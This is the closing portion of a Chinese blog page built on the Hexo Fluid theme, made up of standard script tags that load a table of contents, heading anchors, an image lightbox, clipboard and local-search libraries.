      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
